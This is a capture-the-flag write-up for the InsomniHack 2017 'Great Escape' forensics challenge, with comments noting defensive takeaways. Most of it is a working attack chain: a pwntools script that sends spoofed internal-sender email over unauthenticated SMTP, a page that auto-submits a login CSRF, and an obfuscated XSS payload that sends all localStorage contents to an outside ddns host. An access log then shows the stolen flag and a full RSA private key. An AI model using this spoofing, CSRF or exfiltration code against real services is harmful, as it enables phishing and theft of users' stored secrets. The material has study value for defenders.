# InsomniHack teaser 2k17: The Great Escape - part 2 - forensics - 200 pts


# ./certbot-auto

# cat phishing.py
from pwn import *

# Replays a fixed, plain-text SMTP dialogue against the challenge mail server.
# No STARTTLS or AUTH command is sent, and both the envelope sender and the
# From: header name a mailbox in the server's own domain, so delivery relies
# on the server accepting unauthenticated mail that claims an internal sender.
# Defensive takeaway: require authentication (or reject outright) when an
# external client presents a local-domain sender, and validate SPF/DKIM.
host = 'ssc.teaser.insomnihack.ch'
port = 25

# Complete message (headers plus a one-part multipart body holding the link).
# The trailing "." line is the SMTP end-of-data marker; sendlineafter() adds
# one more newline after it.
message = '''Content-Type: multipart/mixed; boundary="===============5398474817237612449=="
MIME-Version: 1.0
From: gr27@ssc.teaser.insomnihack.ch
To: rogue@ssc.teaser.insomnihack.ch
Date: Fri, 20 Jan 2017 11:51:27 +0000
Subject: Good links

--===============5398474817237612449==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Hello Rogue,

https://thegreatescape2.ddns.net/links.html

GR-27

--===============5398474817237612449==--
.\r\n'''

# (server text to wait for, client line to send) pairs, in protocol order:
# banner -> EHLO, EHLO reply -> MAIL FROM, Ok -> RCPT TO, Ok -> DATA,
# DATA prompt -> message.
dialogue = [
    ('(Ubuntu)', 'ehlo ip-172-31-36-141.eu-west-1.compute.internal'),
    ('250 SMTPUTF8', 'mail FROM:<gr27@ssc.teaser.insomnihack.ch>'),
    ('Ok', 'rcpt TO:<rogue@ssc.teaser.insomnihack.ch>'),
    ('Ok', 'data'),
    ('.<CR><LF>', message),
]

r = remote(host, port)

# NOTE(review): nothing is read after the last send, so the script itself never
# sees the server's reply to the end-of-data marker; delivery is only confirmed
# indirectly by the web-server access log shown later in the write-up.
for expect, line in dialogue:
    r.sendlineafter(expect, line)

# cat /var/www/html/links.html
<!--
  links.html: the page the e-mailed link points to (CTF write-up artefact).

  What the markup does:
    * The form POSTs action=login, a crafted "name" and password=tge2
      cross-site to /api/user.php on ssc.teaser.insomnihack.ch. The script at
      the bottom submits it as soon as the DOM is ready, so no click is needed
      (a login CSRF).
    * The "name" value carries an <img> tag with an onerror handler. Its
      String.fromCharCode list decodes to a <script> element that concatenates
      every localStorage value and sends the result as the "ls" query
      parameter of a GET request to get.html on the page author's host.

  The handler only runs inside the target origin if user.php echoes "name"
  back into HTML without encoding. The access-log entry further down this
  write-up (Referer .../api/user.php, ls=... holding JWK key material)
  indicates that it did.

  Defensive notes: HTML-encode reflected fields; require a CSRF token or
  SameSite cookies on the login endpoint; apply a Content-Security-Policy that
  blocks inline event handlers; keep private keys out of localStorage (WebCrypto
  keys can be created non-extractable; the leaked JWK shows "ext":true).
-->
<html>
     <form id="1234" action="https://ssc.teaser.insomnihack.ch/api/user.php" method="post">
          <input name="action" value="login" />
   <input name="name" value="<img src='a' onerror='javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,62,118,97,114,32,100,97,116,97,32,61,32,39,39,59,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,108,111,99,97,108,83,116,111,114,97,103,101,41,123,32,100,97,116,97,32,43,61,32,108,111,99,97,108,83,116,111,114,97,103,101,46,103,101,116,73,116,101,109,40,107,101,121,41,125,118,97,114,32,104,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,32,39,104,116,116,112,115,58,47,47,116,104,101,103,114,101,97,116,101,115,99,97,112,101,50,46,100,100,110,115,46,110,101,116,47,103,101,116,46,104,116,109,108,63,108,115,61,39,32,43,32,100,97,116,97,44,32,116,114,117,101,41,59,104,116,116,112,46,115,101,110,100,40,41,59,60,47,115,99,114,105,112,116,62))'/>"/>
         <input name="password" value="tge2"/>
        </form>
</html>

<!-- jQuery is loaded only for the $(document).ready hook used below. -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  // Auto-submit the first (and only) form once the DOM is ready.
  $(document).ready(function() {
       window.document.forms[0].submit();
         });
</script>

# python phishing.py
[+] Opening connection to ssc.teaser.insomnihack.ch on port 25: Done
[*] Closed connection to ssc.teaser.insomnihack.ch port 25

# tail -f /var/log/apache2/access.log
52.214.142.175 - - [29/Jan/2017:09:27:14 +0000] "GET /links.html HTTP/1.1" 200 4202 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"
52.214.142.175 - - [29/Jan/2017:09:27:15 +0000] "GET /get.html?ls=INS{IhideMyVulnsWithCrypto}{"alg":"RSA-OAEP-256","d":"CFSPW_AU_cK07bOtdnzbj5MgBqdweDY04Ku-mHSrAIbDv3J_lHH-jCPQb5U2JR4v08eMXlz3AassULQr60rskdwjdPN7Nen15yRcRTsaoSyRTd2qM8O_U-K6Gy7Lvg_ld2HOlHNBBy2k8g8cP7cpjyy7Ebsk5MUNy_udx9aMs7497RaIrCFnpT7RztudkYBo_2Oy5xm6BcsV9059HBhbKbUqq6Ui9_BZ3H7sdwTqlYx3afVV5AgE61eEdWK7vK_yI65Ru_5_fOBWik7xf7fwPjf7COp1HfTZiFbCIWTUaXVe6ThfMoTdwT1wQ0wwuFdtpGTkk8d4XwGtDa8-_XbmIQ","dp":"hapJ7dlVsPvF9no_s-Nfnpv2dZ5a5_C2AyPo_-_mVi4-1a7HTkW9SyGg1KextCPYRAwQZ1wU3bL6P_4TjkrYiAAl-8Iq6moUqWuRY7G8vo3N_P3aBwjgyNTzk3eHfnUFP4QgGOooT2ZwyuDTDSbwKOesnD13q4U_vjtjcZaFU70","dq":"Ts_hwWPsLOjp-yJg0wbQEONeqbvNPLCChb5QJItXvUaL2JcN9muozrN1GZqu383-h8gZ-VUm3-CFU7OWeGYLa0PZlq1uGNvsdffgdNL3MYZ2KwMhXkwXKf45ePhx_ydiblYhb44cFtm0ffXKSPlvbyzLHvJ2_o8ggok0Lzu-weE","e":"AQAB","ext":true,"key_ops":["decrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ","p":"29_YD0m-NFoUTmst33E4p2VBDlCeQ1MJdr_7tO4ERF8aww0e8hu3jRq5PMHCEc8G8gA4q2kuXylIpaB5mWzcQplDDMgIDGupEnL_J0ynMcg-HUld8NDaya7mQWtLHvSEAoB-2MymBTJYaTwsvAYtTI8ruaqhMo4-cKjs5zQfmj0","q":"xz2B2WzMdesiDK7dzorVdJlBgIShj2cMRGwhXcSiWfbY2M4Y3DB_m8p5tdEUIU6g0oWbSfmaYF_MsQxijXRxxe17nuYssns2ue4hYm2xH4mTY6voeNhbOeu7LtOXepUWxN-5520suTvL74Lx9xwWrdeTGIF1_zECqbWRuFieSvk","qi":"VhY5UYLTv20Btpq4MlizFPSuuItbfmK61P0rqEXe-sYHTitMNDBOWDSwIqj4pHkDTFaOCG0o6z81MyVg_bmz2ODzkHDrJUeiOVSMISxlaeSRf2JhiVYMfXiWKJBGCP-PgWuHp5NwLwESZT3aZ0KBYSkE7jnfcttWbc0mYu1glWg"}{"alg":"RSA-OAEP-256","e":"AQAB","ext":true,"key_ops":["encrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0
xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ"}nullnullnullnullnullnull HTTP/1.1" 404 3761 "https://ssc.teaser.insomnihack.ch/api/user.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"
